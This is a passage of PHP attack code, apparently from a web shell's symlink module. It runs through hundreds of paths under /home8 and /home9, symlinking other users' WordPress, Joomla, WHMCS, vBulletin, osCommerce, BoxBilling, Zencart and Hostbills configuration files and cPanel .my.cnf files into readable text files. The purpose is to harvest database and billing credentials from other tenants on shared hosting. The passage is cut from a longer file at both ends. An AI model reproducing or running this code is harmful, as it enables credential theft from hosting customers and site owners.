  2289. @symlink('/home8/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2290. @symlink('/home8/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2291. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2292. @symlink('/home8/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2293. @symlink('/home8/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2294. @symlink('/home8/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2295. @symlink('/home8/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2296. @symlink('/home8/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2297. @symlink('/home8/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2298. @symlink('/home8/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2299. @symlink('/home8/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2300. @symlink('/home8/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2301. @symlink('/home8/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2302. @symlink('/home8/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2303. @symlink('/home8/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2304. @symlink('/home8/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2305. @symlink('/home8/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2306. @symlink('/home8/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2307. @symlink('/home8/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2308. @symlink('/home8/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2309. @symlink('/home8/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2310. @symlink('/home8/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2311. @symlink('/home8/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2312. @symlink('/home8/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2313. @symlink('/home8/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2314. @symlink('/home8/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2315. @symlink('/home8/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2316. @symlink('/home8/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2317. @symlink('/home8/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2318. @symlink('/home8/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2319. @symlink('/home8/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2320. @symlink('/home8/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2321. @symlink('/home8/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2322. @symlink('/home8/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2323. @symlink('/home8/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2324. @symlink('/home8/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2325. @symlink('/home8/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2326. @symlink('/home8/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2327. @symlink('/home8/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2328. @symlink('/home8/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2329. @symlink('/home8/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2330. @symlink('/home8/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2331. @symlink('/home8/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2332. @symlink('/home8/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2333. @symlink('/home8/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2334. @symlink('/home8/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2335. @symlink('/home8/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2336. @symlink('/home8/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2337. @symlink('/home8/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2338. @symlink('/home8/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2339. @symlink('/home8/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2340. @symlink('/home8/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2341. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2342. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2343. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2344. @symlink('/home8/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2345. @symlink('/home8/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2346. @symlink('/home8/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2347. @symlink('/home8/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2348. @symlink('/home8/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2349. @symlink('/home8/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2350. @symlink('/home8/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2351. @symlink('/home8/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2352. @symlink('/home8/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2353. @symlink('/home8/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2354. @symlink('/home8/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2355. @symlink('/home8/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2356. @symlink('/home8/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2357. @symlink('/home8/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2358. @symlink('/home8/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2359. @symlink('/home8/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2360. @symlink('/home8/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2361. @symlink('/home8/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2362. @symlink('/home8/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2363. @symlink('/home8/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2364. @symlink('/home8/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2365. @symlink('/home8/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2366. @symlink('/home8/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2367. @symlink('/home8/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2368. @symlink('/home8/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2369. @symlink('/home8/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2370. @symlink('/home8/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2371. @symlink('/home8/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2372. @symlink('/home8/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2373. @symlink('/home8/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2374. @symlink('/home8/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2375. @symlink('/home8/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2376. @symlink('/home8/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2377. @symlink('/home8/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2378. @symlink('/home8/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2379. @symlink('/home8/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2380. @symlink('/home8/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2381. @symlink('/home8/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2382. @symlink('/home8/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2383. @symlink('/home8/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2384. @symlink('/home8/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2385. @symlink('/home8/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2386. @symlink('/home8/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2387. @symlink('/home8/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2388. @symlink('/home8/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2389. @symlink('/home8/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2390. @symlink('/home8/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2391. @symlink('/home8/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2392. @symlink('/home8/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2393. @symlink('/home8/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2394. @symlink('/home8/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2395. @symlink('/home8/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2396. @symlink('/home8/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2397. @symlink('/home8/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2398. @symlink('/home8/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2399. @symlink('/home8/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2400. @symlink('/home8/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2401. @symlink('/home8/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2402. @symlink('/home8/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2403. @symlink('/home8/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2404. @symlink('/home8/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2405. @symlink('/home8/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2406. @symlink('/home8/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2407. @symlink('/home8/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2408. @symlink('/home8/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
  2409. @symlink('/home8/'.$user.'/public_html/support/includes/iso4217.php',$user.'-Hostbills.txt');
  2410. @symlink('/home8/'.$user.'/public_html/hosting/includes/iso4217.php',$user.'-Hostbills.txt');
  2411. @symlink('/home8/'.$user.'/public_html/cart/includes/iso4217.php',$user.'-Hostbills.txt');
  2412. @symlink('/home8/'.$user.'/public_html/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2413. @symlink('/home8/'.$user.'/public_html/client/includes/iso4217.php',$user.'-Hostbills.txt');
  2414. @symlink('/home8/'.$user.'/public_html/clients/includes/iso4217.php',$user.'-Hostbills.txt');
  2415. @symlink('/home8/'.$user.'/public_html/cliente/includes/iso4217.php',$user.'-Hostbills.txt');
  2416. @symlink('/home8/'.$user.'/public_html/clientes/includes/iso4217.php',$user.'-Hostbills.txt');
  2417. @symlink('/home8/'.$user.'/public_html/billing/includes/iso4217.php',$user.'-Hostbills.txt');
  2418. @symlink('/home8/'.$user.'/public_html/billings/includes/iso4217.php',$user.'-Hostbills.txt');
  2419. @symlink('/home8/'.$user.'/public_html/my/includes/iso4217.php',$user.'-Hostbills.txt');
  2420. @symlink('/home8/'.$user.'/public_html/secure/includes/iso4217.php',$user.'-Hostbills.txt');
  2421. @symlink('/home8/'.$user.'/public_html/support/order/includes/iso4217.php',$user.'-Hostbills.txt');
  2422. @symlink('/home8/'.$user.'/.my.cnf',$user.'-Cpanel.txt');
  2423. @symlink('/home8/'.$user.'/public_html/po-content/config.php',$user.'-Popoji.txt');
  2424.  
  2425. //home 9
  2426.  
  2427. @symlink('/home9/'.$user.'/public_html/vb/includes/config.php',$user.'-Vbulletin.txt');
  2428. @symlink('/home9/'.$user.'/public_html/includes/config.php',$user.'-Vbulletin.txt');
  2429. @symlink('/home9/'.$user.'/public_html/forum/includes/config.php',$user.'-Vbulletin.txt');
  2430. @symlink('/home9/'.$user.'/public_html/forums/includes/config.php',$user.'-Vbulletin.txt');
  2431. @symlink('/home9/'.$user.'/public_html/cc/includes/config.php',$user.'-Vbulletin.txt');
  2432. @symlink('/home9/'.$user.'/public_html/inc/config.php',$user.'-MyBB.txt');
  2433. @symlink('/home9/'.$user.'/public_html/includes/configure.php',$user.'-OsCommerce.txt');
  2434. @symlink('/home9/'.$user.'/public_html/shop/includes/configure.php',$user.'-OsCommerce.txt');
  2435. @symlink('/home9/'.$user.'/public_html/os/includes/configure.php',$user.'-OsCommerce.txt');
  2436. @symlink('/home9/'.$user.'/public_html/oscom/includes/configure.php',$user.'-OsCommerce.txt');
  2437. @symlink('/home9/'.$user.'/public_html/products/includes/configure.php',$user.'-OsCommerce.txt');
  2438. @symlink('/home9/'.$user.'/public_html/cart/includes/configure.php',$user.'-OsCommerce.txt');
  2439. @symlink('/home9/'.$user.'/public_html/inc/conf_global.php',$user.'-IPB.txt');
  2440. @symlink('/home9/'.$user.'/public_html/wp-config.php',$user.'-Wordpress.txt');
  2441. @symlink('/home9/'.$user.'/public_html/wp/test/wp-config.php',$user.'-Wordpress.txt');
  2442. @symlink('/home9/'.$user.'/public_html/blog/wp-config.php',$user.'-Wordpress.txt');
  2443. @symlink('/home9/'.$user.'/public_html/beta/wp-config.php',$user.'-Wordpress.txt');
  2444. @symlink('/home9/'.$user.'/public_html/portal/wp-config.php',$user.'-Wordpress.txt');
  2445. @symlink('/home9/'.$user.'/public_html/site/wp-config.php',$user.'-Wordpress.txt');
  2446. @symlink('/home9/'.$user.'/public_html/wp/wp-config.php',$user.'-Wordpress.txt');
  2447. @symlink('/home9/'.$user.'/public_html/WP/wp-config.php',$user.'-Wordpress.txt');
  2448. @symlink('/home9/'.$user.'/public_html/news/wp-config.php',$user.'-Wordpress.txt');
  2449. @symlink('/home9/'.$user.'/public_html/wordpress/wp-config.php',$user.'-Wordpress.txt');
  2450. @symlink('/home9/'.$user.'/public_html/test/wp-config.php',$user.'-Wordpress.txt');
  2451. @symlink('/home9/'.$user.'/public_html/demo/wp-config.php',$user.'-Wordpress.txt');
  2452. @symlink('/home9/'.$user.'/public_html/home/wp-config.php',$user.'-Wordpress.txt');
  2453. @symlink('/home9/'.$user.'/public_html/v1/wp-config.php',$user.'-Wordpress.txt');
  2454. @symlink('/home9/'.$user.'/public_html/v2/wp-config.php',$user.'-Wordpress.txt');
  2455. @symlink('/home9/'.$user.'/public_html/press/wp-config.php',$user.'-Wordpress.txt');
  2456. @symlink('/home9/'.$user.'/public_html/new/wp-config.php',$user.'-Wordpress.txt');
  2457. @symlink('/home9/'.$user.'/public_html/blogs/wp-config.php',$user.'-Wordpress.txt');
  2458. @symlink('/home9/'.$user.'/public_html/configuration.php',$user.'-Joomla.txt');
  2459. @symlink('/home9/'.$user.'/public_html/blog/configuration.php',$user.'-Joomla.txt');
  2460. @symlink('/home9/'.$user.'/public_html/submitticket.php',$user.'-^WHMCS.txt');
  2461. @symlink('/home9/'.$user.'/public_html/cms/configuration.php',$user.'-Joomla.txt');
  2462. @symlink('/home9/'.$user.'/public_html/beta/configuration.php',$user.'-Joomla.txt');
  2463. @symlink('/home9/'.$user.'/public_html/portal/configuration.php',$user.'-Joomla.txt');
  2464. @symlink('/home9/'.$user.'/public_html/site/configuration.php',$user.'-Joomla.txt');
  2465. @symlink('/home9/'.$user.'/public_html/main/configuration.php',$user.'-Joomla.txt');
  2466. @symlink('/home9/'.$user.'/public_html/home/configuration.php',$user.'-Joomla.txt');
  2467. @symlink('/home9/'.$user.'/public_html/demo/configuration.php',$user.'-Joomla.txt');
  2468. @symlink('/home9/'.$user.'/public_html/test/configuration.php',$user.'-Joomla.txt');
  2469. @symlink('/home9/'.$user.'/public_html/v1/configuration.php',$user.'-Joomla.txt');
  2470. @symlink('/home9/'.$user.'/public_html/v2/configuration.php',$user.'-Joomla.txt');
  2471. @symlink('/home9/'.$user.'/public_html/joomla/configuration.php',$user.'-Joomla.txt');
  2472. @symlink('/home9/'.$user.'/public_html/new/configuration.php',$user.'-Joomla.txt');
  2473. @symlink('/home9/'.$user.'/public_html/WHMCS/configuration.php',$user.'-WHMCS.txt');
  2474. @symlink('/home9/'.$user.'/public_html/whmcs1/configuration.php',$user.'-WHMCS.txt');
  2475. @symlink('/home9/'.$user.'/public_html/Whmcs/configuration.php',$user.'-WHMCS.txt');
  2476. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2477. @symlink('/home9/'.$user.'/public_html/whmcs/configuration.php',$user.'-WHMCS.txt');
  2478. @symlink('/home9/'.$user.'/public_html/WHMC/configuration.php',$user.'-WHMCS.txt');
  2479. @symlink('/home9/'.$user.'/public_html/Whmc/configuration.php',$user.'-WHMCS.txt');
  2480. @symlink('/home9/'.$user.'/public_html/whmc/configuration.php',$user.'-WHMCS.txt');
  2481. @symlink('/home9/'.$user.'/public_html/WHM/configuration.php',$user.'-WHMCS.txt');
  2482. @symlink('/home9/'.$user.'/public_html/Whm/configuration.php',$user.'-WHMCS.txt');
  2483. @symlink('/home9/'.$user.'/public_html/whm/configuration.php',$user.'-WHMCS.txt');
  2484. @symlink('/home9/'.$user.'/public_html/HOST/configuration.php',$user.'-WHMCS.txt');
  2485. @symlink('/home9/'.$user.'/public_html/Host/configuration.php',$user.'-WHMCS.txt');
  2486. @symlink('/home9/'.$user.'/public_html/host/configuration.php',$user.'-WHMCS.txt');
  2487. @symlink('/home9/'.$user.'/public_html/SUPPORTES/configuration.php',$user.'-WHMCS.txt');
  2488. @symlink('/home9/'.$user.'/public_html/Supportes/configuration.php',$user.'-WHMCS.txt');
  2489. @symlink('/home9/'.$user.'/public_html/supportes/configuration.php',$user.'-WHMCS.txt');
  2490. @symlink('/home9/'.$user.'/public_html/domains/configuration.php',$user.'-WHMCS.txt');
  2491. @symlink('/home9/'.$user.'/public_html/domain/configuration.php',$user.'-WHMCS.txt');
  2492. @symlink('/home9/'.$user.'/public_html/Hosting/configuration.php',$user.'-WHMCS.txt');
  2493. @symlink('/home9/'.$user.'/public_html/HOSTING/configuration.php',$user.'-WHMCS.txt');
  2494. @symlink('/home9/'.$user.'/public_html/hosting/configuration.php',$user.'-WHMCS.txt');
  2495. @symlink('/home9/'.$user.'/public_html/CART/configuration.php',$user.'-WHMCS.txt');
  2496. @symlink('/home9/'.$user.'/public_html/Cart/configuration.php',$user.'-WHMCS.txt');
  2497. @symlink('/home9/'.$user.'/public_html/cart/configuration.php',$user.'-WHMCS.txt');
  2498. @symlink('/home9/'.$user.'/public_html/ORDER/configuration.php',$user.'-WHMCS.txt');
  2499. @symlink('/home9/'.$user.'/public_html/Order/configuration.php',$user.'-WHMCS.txt');
  2500. @symlink('/home9/'.$user.'/public_html/order/configuration.php',$user.'-WHMCS.txt');
  2501. @symlink('/home9/'.$user.'/public_html/CLIENT/configuration.php',$user.'-WHMCS.txt');
  2502. @symlink('/home9/'.$user.'/public_html/Client/configuration.php',$user.'-WHMCS.txt');
  2503. @symlink('/home9/'.$user.'/public_html/client/configuration.php',$user.'-WHMCS.txt');
  2504. @symlink('/home9/'.$user.'/public_html/CLIENTAREA/configuration.php',$user.'-WHMCS.txt');
  2505. @symlink('/home9/'.$user.'/public_html/Clientarea/configuration.php',$user.'-WHMCS.txt');
  2506. @symlink('/home9/'.$user.'/public_html/clientarea/configuration.php',$user.'-WHMCS.txt');
  2507. @symlink('/home9/'.$user.'/public_html/SUPPORT/configuration.php',$user.'-WHMCS.txt');
  2508. @symlink('/home9/'.$user.'/public_html/Support/configuration.php',$user.'-WHMCS.txt');
  2509. @symlink('/home9/'.$user.'/public_html/support/configuration.php',$user.'-WHMCS.txt');
  2510. @symlink('/home9/'.$user.'/public_html/BILLING/configuration.php',$user.'-WHMCS.txt');
  2511. @symlink('/home9/'.$user.'/public_html/Billing/configuration.php',$user.'-WHMCS.txt');
  2512. @symlink('/home9/'.$user.'/public_html/billing/configuration.php',$user.'-WHMCS.txt');
  2513. @symlink('/home9/'.$user.'/public_html/BUY/configuration.php',$user.'-WHMCS.txt');
  2514. @symlink('/home9/'.$user.'/public_html/Buy/configuration.php',$user.'-WHMCS.txt');
  2515. @symlink('/home9/'.$user.'/public_html/buy/configuration.php',$user.'-WHMCS.txt');
  2516. @symlink('/home9/'.$user.'/public_html/MANAGE/configuration.php',$user.'-WHMCS.txt');
  2517. @symlink('/home9/'.$user.'/public_html/Manage/configuration.php',$user.'-WHMCS.txt');
  2518. @symlink('/home9/'.$user.'/public_html/manage/configuration.php',$user.'-WHMCS.txt');
  2519. @symlink('/home9/'.$user.'/public_html/CLIENTSUPPORT/configuration.php',$user.'-WHMCS.txt');
  2520. @symlink('/home9/'.$user.'/public_html/ClientSupport/configuration.php',$user.'-WHMCS.txt');
  2521. @symlink('/home9/'.$user.'/public_html/Clientsupport/configuration.php',$user.'-WHMCS.txt');
  2522. @symlink('/home9/'.$user.'/public_html/clientsupport/configuration.php',$user.'-WHMCS.txt');
  2523. @symlink('/home9/'.$user.'/public_html/CHECKOUT/configuration.php',$user.'-WHMCS.txt');
  2524. @symlink('/home9/'.$user.'/public_html/Checkout/configuration.php',$user.'-WHMCS.txt');
  2525. @symlink('/home9/'.$user.'/public_html/checkout/configuration.php',$user.'-WHMCS.txt');
  2526. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2527. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2528. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2529. @symlink('/home9/'.$user.'/public_html/BASKET/configuration.php',$user.'-WHMCS.txt');
  2530. @symlink('/home9/'.$user.'/public_html/Basket/configuration.php',$user.'-WHMCS.txt');
  2531. @symlink('/home9/'.$user.'/public_html/basket/configuration.php',$user.'-WHMCS.txt');
  2532. @symlink('/home9/'.$user.'/public_html/SECURE/configuration.php',$user.'-WHMCS.txt');
  2533. @symlink('/home9/'.$user.'/public_html/Secure/configuration.php',$user.'-WHMCS.txt');
  2534. @symlink('/home9/'.$user.'/public_html/secure/configuration.php',$user.'-WHMCS.txt');
  2535. @symlink('/home9/'.$user.'/public_html/SALES/configuration.php',$user.'-WHMCS.txt');
  2536. @symlink('/home9/'.$user.'/public_html/Sales/configuration.php',$user.'-WHMCS.txt');
  2537. @symlink('/home9/'.$user.'/public_html/sales/configuration.php',$user.'-WHMCS.txt');
  2538. @symlink('/home9/'.$user.'/public_html/BILL/configuration.php',$user.'-WHMCS.txt');
  2539. @symlink('/home9/'.$user.'/public_html/Bill/configuration.php',$user.'-WHMCS.txt');
  2540. @symlink('/home9/'.$user.'/public_html/bill/configuration.php',$user.'-WHMCS.txt');
  2541. @symlink('/home9/'.$user.'/public_html/PURCHASE/configuration.php',$user.'-WHMCS.txt');
  2542. @symlink('/home9/'.$user.'/public_html/Purchase/configuration.php',$user.'-WHMCS.txt');
  2543. @symlink('/home9/'.$user.'/public_html/purchase/configuration.php',$user.'-WHMCS.txt');
  2544. @symlink('/home9/'.$user.'/public_html/ACCOUNT/configuration.php',$user.'-WHMCS.txt');
  2545. @symlink('/home9/'.$user.'/public_html/Account/configuration.php',$user.'-WHMCS.txt');
  2546. @symlink('/home9/'.$user.'/public_html/account/configuration.php',$user.'-WHMCS.txt');
  2547. @symlink('/home9/'.$user.'/public_html/USER/configuration.php',$user.'-WHMCS.txt');
  2548. @symlink('/home9/'.$user.'/public_html/User/configuration.php',$user.'-WHMCS.txt');
  2549. @symlink('/home9/'.$user.'/public_html/user/configuration.php',$user.'-WHMCS.txt');
  2550. @symlink('/home9/'.$user.'/public_html/CLIENTS/configuration.php',$user.'-WHMCS.txt');
  2551. @symlink('/home9/'.$user.'/public_html/Clients/configuration.php',$user.'-WHMCS.txt');
  2552. @symlink('/home9/'.$user.'/public_html/clients/configuration.php',$user.'-WHMCS.txt');
  2553. @symlink('/home9/'.$user.'/public_html/BILLINGS/configuration.php',$user.'-WHMCS.txt');
  2554. @symlink('/home9/'.$user.'/public_html/Billings/configuration.php',$user.'-WHMCS.txt');
  2555. @symlink('/home9/'.$user.'/public_html/billings/configuration.php',$user.'-WHMCS.txt');
  2556. @symlink('/home9/'.$user.'/public_html/MY/configuration.php',$user.'-WHMCS.txt');
  2557. @symlink('/home9/'.$user.'/public_html/My/configuration.php',$user.'-WHMCS.txt');
  2558. @symlink('/home9/'.$user.'/public_html/my/configuration.php',$user.'-WHMCS.txt');
  2559. @symlink('/home9/'.$user.'/public_html/secure/whm/configuration.php',$user.'-WHMCS.txt');
  2560. @symlink('/home9/'.$user.'/public_html/secure/whmcs/configuration.php',$user.'-WHMCS.txt');
  2561. @symlink('/home9/'.$user.'/public_html/panel/configuration.php',$user.'-WHMCS.txt');
  2562. @symlink('/home9/'.$user.'/public_html/clientes/configuration.php',$user.'-WHMCS.txt');
  2563. @symlink('/home9/'.$user.'/public_html/cliente/configuration.php',$user.'-WHMCS.txt');
  2564. @symlink('/home9/'.$user.'/public_html/support/order/configuration.php',$user.'-WHMCS.txt');
  2565. @symlink('/home9/'.$user.'/public_html/bb-config.php',$user.'-BoxBilling.txt');
  2566. @symlink('/home9/'.$user.'/public_html/boxbilling/bb-config.php',$user.'-BoxBilling.txt');
  2567. @symlink('/home9/'.$user.'/public_html/box/bb-config.php',$user.'-BoxBilling.txt');
  2568. @symlink('/home9/'.$user.'/public_html/host/bb-config.php',$user.'-BoxBilling.txt');
  2569. @symlink('/home9/'.$user.'/public_html/Host/bb-config.php',$user.'-BoxBilling.txt');
  2570. @symlink('/home9/'.$user.'/public_html/supportes/bb-config.php',$user.'-BoxBilling.txt');
  2571. @symlink('/home9/'.$user.'/public_html/support/bb-config.php',$user.'-BoxBilling.txt');
  2572. @symlink('/home9/'.$user.'/public_html/hosting/bb-config.php',$user.'-BoxBilling.txt');
  2573. @symlink('/home9/'.$user.'/public_html/cart/bb-config.php',$user.'-BoxBilling.txt');
  2574. @symlink('/home9/'.$user.'/public_html/order/bb-config.php',$user.'-BoxBilling.txt');
  2575. @symlink('/home9/'.$user.'/public_html/client/bb-config.php',$user.'-BoxBilling.txt');
  2576. @symlink('/home9/'.$user.'/public_html/clients/bb-config.php',$user.'-BoxBilling.txt');
  2577. @symlink('/home9/'.$user.'/public_html/cliente/bb-config.php',$user.'-BoxBilling.txt');
  2578. @symlink('/home9/'.$user.'/public_html/clientes/bb-config.php',$user.'-BoxBilling.txt');
  2579. @symlink('/home9/'.$user.'/public_html/billing/bb-config.php',$user.'-BoxBilling.txt');
  2580. @symlink('/home9/'.$user.'/public_html/billings/bb-config.php',$user.'-BoxBilling.txt');
  2581. @symlink('/home9/'.$user.'/public_html/my/bb-config.php',$user.'-BoxBilling.txt');
  2582. @symlink('/home9/'.$user.'/public_html/secure/bb-config.php',$user.'-BoxBilling.txt');
  2583. @symlink('/home9/'.$user.'/public_html/support/order/bb-config.php',$user.'-BoxBilling.txt');
  2584. @symlink('/home9/'.$user.'/public_html/includes/dist-configure.php',$user.'-Zencart.txt');
  2585. @symlink('/home9/'.$user.'/public_html/zencart/includes/dist-configure.php',$user.'-Zencart.txt');
  2586. @symlink('/home9/'.$user.'/public_html/products/includes/dist-configure.php',$user.'-Zencart.txt');
  2587. @symlink('/home9/'.$user.'/public_html/cart/includes/dist-configure.php',$user.'-Zencart.txt');
  2588. @symlink('/home9/'.$user.'/public_html/shop/includes/dist-configure.php',$user.'-Zencart.txt');
  2589. @symlink('/home9/'.$user.'/public_html/includes/iso4217.php',$user.'-Hostbills.txt');
  2590. @symlink('/home9/'.$user.'/public_html/hostbills/includes/iso4217.php',$user.'-Hostbills.txt');
  2591. @symlink('/home9/'.$user.'/public_html/host/includes/iso4217.php',$user.'-Hostbills.txt');
  2592. @symlink('/home9/'.$user.'/public_html/Host/includes/iso4217.php',$user.'-Hostbills.txt');
  2593. @symlink('/home9/'.$user.'/public_html/supportes/includes/iso4217.php',$user.'-Hostbills.txt');
